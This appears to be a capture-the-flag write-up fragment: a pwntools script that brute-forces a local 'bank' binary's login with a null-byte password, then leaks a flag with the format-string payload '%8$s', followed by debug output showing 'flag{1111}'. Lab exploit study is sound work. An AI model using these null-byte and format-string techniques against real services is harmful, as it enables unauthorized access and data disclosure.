from pwn import *

context.log_level = 'debug'

# Restart the process until the login prompt sequence succeeds.
while True:
    r = process('./bank')
    try:
        r.sendlineafter('account:', 'halo')
        r.sendlineafter('password:', '\x00')
        r.recvuntil('Do you want to check your account balance?')
        r.sendline('yes')
        #gdb.attach(r,"b *0x4014C1")
        break
    except Exception:
        # This attempt failed; close the process and try again.
        r.close()
        continue
r.sendlineafter('Please input your private code: ','%8$s')
r.interactive()
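The result is shown below. Even with bad luck, the brute force generally takes only a few thousand attempts, and a short script like this runs very quickly.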
[*] Process './bank' stopped with exit code 0 (pid 3728)
[DEBUG] Received 0x37 bytes:
    'Your input is: flag{1111}\n'
    '\n'
    '\n'
    'Your private code is wrong!'
Your input is: flag{1111}